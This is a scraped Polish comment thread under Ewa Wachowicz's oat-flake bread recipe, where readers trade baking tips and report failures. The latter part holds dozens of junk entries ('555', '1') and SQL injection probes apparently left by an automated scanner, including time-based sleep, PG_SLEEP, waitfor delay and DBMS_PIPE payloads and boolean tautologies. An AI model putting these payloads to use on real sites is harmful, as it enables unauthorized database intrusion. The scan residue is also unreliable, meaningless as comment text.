ten chleb z płatkami owsianymi Ewy Wachowicz jest pyszny. Polecam!
wczoraj zrobiłam wg przepisu wyszedł zaaaakalec , mam pytanie czy ciasto przed wstawieniem do piekarnika powinno rosnąć
zwykle każdy chleb powinien rosnąć, zostawia się więc go w blaszce na jakiś czas w ciepłym miejscu, jednak tutaj pani Ewa nic chyba takiego nie mówiła
chlebek wygląda przepysznie. W jakiej keksówce zrobić ten chlebek?
standardowa. wymiary około 38 na 8,5 cm (mniej więcej) cm w tą czy w tą, nie zrobi wielkiej różnicy :-)
czyli do podanego wyżej przepisu potrzeba 2 keksówki o wymiarach które podałaś?
tak, dokładnie, zawsze można zrobić na próbę z połowy porcji :-)
dziękuje bardzo za odpowiedź:) pozdrawiam
Chlebek jest pyszny, pięknie wyrósł.Upiekłam go w dwóch małych tortownicach.
Dzisiaj , zamiast mąki pszennej dodałam mąkę żytnią i niestety nie wyrósł- ale zakalec też jest smaczny.
tak, chleb z samej mąki żytniej jest gliniasty. Też próbowałam robić, jeśli już mąka żytnia to pół na pół z pszenną.
keksówki dwie takie jakie macie w domu a jeśli chodzi o to czy zostawić do wyrośnięcia to NIE po włożeniu ciasta do keksówek od razu do piekarnika 180 na ok 1 godz.powietrzem!!!pozdrawiam Gosia
witam! chcialabym zeby ktos mi napisal dokladne skladniki na jeden chlebek.
i czy chlebek piec na termoobiegu?
Proszę sobie wszystkie składniki podzielić na pół 1 kg mąki a więc pół kg mąki, to chyba nie jest wyższa matematyka!
Chleb pieczemy na "góra-dół" nie w termoobiegu.
chlebek smaczniutki i dobrze wypieczony, dalam 20 min zeby wyrosl tak bedzie lepiej,pozdr.
Witam.
Chlebek pyszny!!!! Piekłam 60 min. 180 stop.(góra-dół), 10 min. tylko dół w piekarniku w/g przepisu jw. Polecam.....
czy można piec w piekarniku gazowym , gdzie piecze tylko dół ???????????
można spróbować , ja nigdy nie próbowałam więc ciężko powiedzieć
dzisiaj piekłam chlebek ale mnie też wyszedł zakalec ,jutro druga próba ,bo chleb pyszny .
wczoraj piekłam z całej porcji wyrósł pięknie ale środek był surowy,dzisiaj była druga próba i to samo w środku wielka góra a na dole cale ciasto mokre,to co się upiekło było pyszne ale czemu tak mi się piecze robię wszystko zgodnie z przepisem
Ja ten chlebek robiłam już kilka razy, ale zawsze piekę go dłużej. Po godzinie wyjmuję i sprawdzam, czy upieczony. Ponieważ nie jest upieczony więc wkładam jeszcze na jakieś półgodziny i na ok.15 minut włączam termoobieg z dolną grzałką. Skórka jest wtedy rewelacyjna:)BeWu
Wczoraj lipa zakalec był, a dziś rewelacja piekłam z połowy porcji ale na temperaturze 160 stopni bez góra dół i wyszedł super dwa chlebki lepiej piec na 180 stopni .
Wczoraj piekłam chlebek dokładnie wdgł przepisu,wyszedł przepyszny!!!
piekłam i pierwszy wg przepisu był pyszny a do drugiego dodałam mąki żytniej i wyszła glina nie polecam
chlebuś jest pyszny polecam wszystkich zaskoczyłam takiego nie jedli przepisy ewy są super często podpatruję i próbuję
czy chlebek ładnie mi wyrośnie jeśli użyje mąki pełnoziarnistej?
ktoś tu pisał w komentarzach, że mu nie wyszedł ale ja również mam chęć spróbować z mąką żytnią. Wkrótce zaryzykuję i dam znać :-)
ale mnie chodzi o mąkę pszenną razową, a nie żytnią. :)
no tak :-), nie doczytałam. Co nie zmienia faktu, że nie wiem, proszę spróbować ;-) i podzielić się doświadczeniem :-)
Piekę ten chlebek już od jakiegoś czasu i polecam go wszystkim
żaden chlebek z przepisów internetowych mi się tak nie udał, jak chlebek z płatkami wg przepisu Pani Ewy Wachowicz.Chlebek naprawdę bardzo smaczny.Poleca przepis.Troszkę ulepszyłam -zamiast wody dodałam mleko.
Dzisiaj robiłam ten chlebek.Dodałam jeszcze ziarna dyni.Chleb jest pyszny,nawet moje dzieci się zajadały.
Witam:)ten chlebek pieke co weekend i wychodzi pyszny polecam:)nigdy zakalec mi nie wyszedl:)pozdrowienia dla pani Ewy
chleb jest swietny pieklam wyszedl super polecam bede go piekla ania
ewuniu chleb jest pysznny pieke go czesto wszystkim smakuje pozdrawiam
chlebek jest pyszny zawsze mi sie udaje smakuje wszystkim pozdrawiam stenia
chleb bardzo smaczny ja od siebie dodałam 1ząbek czosnku .
Upiekłam!!! i to jest pierwszy przepis , z którego pięknie wyrósł i ładnie się upiekł chleb. Przez pomyłkę zamiast płatków owsianych dałam 8 łyżek otrębów żytnich i NIC sie nie stało. Skórka trochę jest( była) za twarda mimo posmarowania chlebka wodą, następnym razem spróbuję posmarować oliwą z oliwek. Chlebus pyszny -polecam Marta
ja płatki zalewam wrzącą wodą a gdy ostygnie wkładam resztę i mieszam - musi wyrosnąć- potem do foremek- i znów musi rosnąć- i do nagrzanego pieca -jeszcze nigdy nie wyszedł mi zakalec, zawsze sie udaje.
można odsypać np. pół szkl maki pszennej i w to miejsce dać pół szkl mąki żytniej
Czy ciasto trzeba wyrabiać, czy tylko mieszamy łyżką? Czy chodzi o małe, czy duże keksówki?
Czy ktoś mi odpowie, czy ciasto trzeba wyrabiać? Bardzo proszę:)
Mieszamy bardzo dokładnie do momentu aż wszystkie składniki się połączą. Wymiar keksówki np 20x10, jeśli keksówka będzie za duża to chleb będzie niższy, a jeśli dasz za małą to chleb będzie wyższy.
Dziękuję bardzo za odpowiedź. Ciekawe, że nie wyrabia się ciasta:)
Czy można dodać otrębów owsianych?
pierwszy raz upiekłam ściśle wg przepisu ,był bardzo smaczny ,zjedliśmy do ostatniej kromki ,nawet na trzeci dzień był smaczny i świeży .Dzisiaj coś mnie podkusiło i upiekłam z żytniej .Nie polecam -jeden wielki zakalec nie nadający się do jedzenia oprócz skórki. Jutro następny wypiek z maki pszennej.
Przepis super ,chlebek smaczny i zawsze udaje się wg tego przepisu ,Ja dodaję pół na pół płatków owsianych i żytnich i zamieniam 2 łyżki mąki pszennej na 2 łyżki z pełnego przemiału ,jest nie tak bardzo pszenny .Co ważne zostawiam w blaszkach do wyrośnięcia i dopiero wstawiam do piekarnika .
Pani Ewo pozdrawiam serdecznie -Asia
kilka razy juz pieklam i wychodzi piękny,i smaczny,ostatnio dodalam jeszcze żurawinę.Teraz zamierzam dodac suszone daktyle.Zawsze się udaje,ja wyrabiam w robocie.Pozdrowienia dla pani Ewy,Basia
Jak to się łatwo robi, jak ładnie rośnie. Mi dodało jeszcze 2/3 objetosci, takze wyszły 3 keksówki. Banalne, a jakie dobre.
Ja tez go pieke tylko dodaje jeszcze kminku bo go uwielbiam z maki 650 i zostawiam w foremkach do wyrosniecia jest pyszny pozdrawiam Anna
Mi niestety wyszedł zakalec!!!! A taką miałam na niego ochotę :(
pieklam dzisiaj wyszedl super polecam i pozdrawiam wszystkich.
chlebek rewelacja syn powiedział że tylko taki chce jeść -robiłam go pierwszy raz
Ja daję 0,30 dkg żytnia pytlowa i 0,70 dkg pszenna rewelacja
Bardzo dobry chleb polecam
Czy można dodać zamiast pszennej kukurydzianą mąkę ?
Kukurydziana może być gliniasta. Poza tym jesteśmy przyzwyczajeni do smaku pszennej mąki i inne chleby nie zawsze będą smakowały. Spróbuj i podziel się swoimi uwagami.
z maki żytniej chleb na drożdżach nie wyjdzie , trzeba piec na zakwasie i wtedy jest okej
Chleb żytni typowo na zakwasie, ale Mira próbowała 1/3 mąki żytniej i 2/3 pszennej.
Zrobiłam w/g przepisu Wyszedł rewelacyjny. Drugi raz spróbowałam z mąki żytniej i wyszedł zakalec.Zjedliśmy skórkę i teraz na sylwestra będę piekła w/g przepisu Pozdrawiam wszystkich i życzę udanych wypieków w Nowym 2017 Roku
Chlebek przepyszny.Lubię eksperymentować w kuchni :) zamiast płatków owsianych użyłam płatków ryżowych .Również bardzo dobrze smakuje z prażoną cebulką.Bardzo dziękuję za tak prosty a zarazem wyśmienity przepis.
Beato masz rację, prażona cebulka idealnie pasuje do tego chleba.
ja kiedyś dałam mąke pół na pół czyli mąka pszenna i żytnia i też wyszedł zakalec, teraz z kilograma mąki pszenne 650 odsypuję pół szklani mąki , a w zamian dosypuję pół szklanki mąki żytniej 2000 i dalej postępuję jak w przepisie , chleb jest bardzo dobry, wychodzą 2 keksówki ,nie zostawiam chleba do wyrośnięcia tylko po wyrobieniu wkładam do piekarnika . Mąkę kupuję w Lidlu pozdrawiam i życzę smacznego
Gosiu ja kiedyś zrobiłam na przekór w jednej keksówce i połowa chleba wypłynęła na zewnątrz :-) teraz robię jak w przepisie.
Ja piekłam dłużej niz h bo zapomniałam o nim. I wydaje mi sir ze jak bym wyjęła wcześniej to ws rodku był by surowy.
Skórka była dość twarda. Czy to normalne? Ogólnie dobry.
Tak ten chleb ma twardawą skórkę, ale jak pokroisz to na kromkach nie odczuwa się twardości skórki :-) Chleb jest przepyszny
Aaa rozumiem że Tak ma być Anka.
Na drugi dzień bardziej miękki xd
Dzisiaj piekłam. Dokładnie wg przepisu - pięknie wyrósł, a w środku totalny zakalec.
Mi chleb wychodzi za każdym razem. Jaki masz piekarnik?
Witam Pani Ewo,,czy mogła by mi Pani pomoc jaki chleb mogę upiec dla osoby bezglutenowej.Pieke Pani chlebek z płatkami owsianymi jest pyszny i bardzo prosiła bym o przepis na chlebek bezglutenowy,pozdrawiam
Czy można stosować drożdże suche ? W jaki sposób ? Czw takiej samej ilości (50 gram) ?
50 gramów drożdży świeżych to 14 gramów drożdży instant.
Jakie duże mają być blaszki ?
Super przepis szybki i prosty mi się szybko robi ten chleb.
Chleb piekę na blaszce 31 cm na 14 cm wysokość ok 9 cm i jest w sam raz.
chleb najlepiej wychodzi z mąki 650 i zdodatkiem czarnuszki
Świetny przepis. Chlebek wyszedł wyśmienity. Krok po kroku zgodnie z przepisem. Zjedzony na następny dzień po upieczeniu. Tego samego dnia troszkę gliniasty. Na drugi dzień -palce lizać. Dodałam pestki dyniowe, posmarowałam wodą bezpośrednio po upieczeniu.
555
1
1
555
555
1
1
555
555
555
555
555
555
555
1
555
1
1
1
1
1
1
555
1
555
1
555
1
555
1
555
1
555
1
555
555
555
1
555
1
555
-1 OR 2+121-121-1=0+0+0+1 --
-1 OR 2+723-723-1=0+0+0+1
-1' OR 2+307-307-1=0+0+0+1 --
-1' OR 2+765-765-1=0+0+0+1 or '7xIQSSpN'='
-1" OR 2+530-530-1=0+0+0+1 --
1
555*if(now()=sysdate(),sleep(15),0)
1
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
1
5550'XOR(555*if(now()=sysdate(),sleep(3),0))XOR'Z
1
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
1
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
1
555-1; waitfor delay '0:0:15' --
1
555-1); waitfor delay '0:0:15' --
1
1
1
1
555-1 waitfor delay '0:0:15' --
1
5550OiEJaWn'; waitfor delay '0:0:15' --
1
-1 OR 2+953-953-1=0+0+0+1 --
-1 OR 2+250-250-1=0+0+0+1
-1' OR 2+548-548-1=0+0+0+1 --
-1' OR 2+526-526-1=0+0+0+1 or 'cylbfwn6'='
555-1 OR 124=(SELECT 124 FROM PG_SLEEP(15))--
-1" OR 2+197-197-1=0+0+0+1 --
555-1) OR 827=(SELECT 827 FROM PG_SLEEP(15))--
1*if(now()=sysdate(),sleep(15),0)
555-1)) OR 73=(SELECT 73 FROM PG_SLEEP(15))--
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
555PCtOfe74' OR 805=(SELECT 805 FROM PG_SLEEP(15))--
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
5558K6WNlfl') OR 607=(SELECT 607 FROM PG_SLEEP(15))--
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555Jk69HUJy')) OR 66=(SELECT 66 FROM PG_SLEEP(15))--
1-1; waitfor delay '0:0:15' --
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1-1); waitfor delay '0:0:15' --
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555'"
555Ŕ§Ŕ˘%2527%2522\'\"
@@zjj4z
1-1 waitfor delay '0:0:15' --
555
1nRSfUQEQ'; waitfor delay '0:0:15' --
555
555
1-1 OR 68=(SELECT 68 FROM PG_SLEEP(15))--
555
555
555
555
1-1) OR 665=(SELECT 665 FROM PG_SLEEP(15))--
555
1-1)) OR 144=(SELECT 144 FROM PG_SLEEP(15))--
555
1VCuBpay9' OR 586=(SELECT 586 FROM PG_SLEEP(15))--
555
1bGwhcM5n') OR 627=(SELECT 627 FROM PG_SLEEP(15))--
555
1oZnLcL50')) OR 910=(SELECT 910 FROM PG_SLEEP(15))--
555
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
1Ŕ§Ŕ˘%2527%2522\'\"
555
@@6Mfis
555
1
555
1
555
555
555
555
1
1
1
1
1
1
1
1
1
1
1
1
1
1
555
1
215 komentarzy
Posiadasz sprzwdzony przepis na Chleb z płatkami owsianymi Ewy Wachowicz prześlij przepis w komentarzu. Niech inni też go spróbują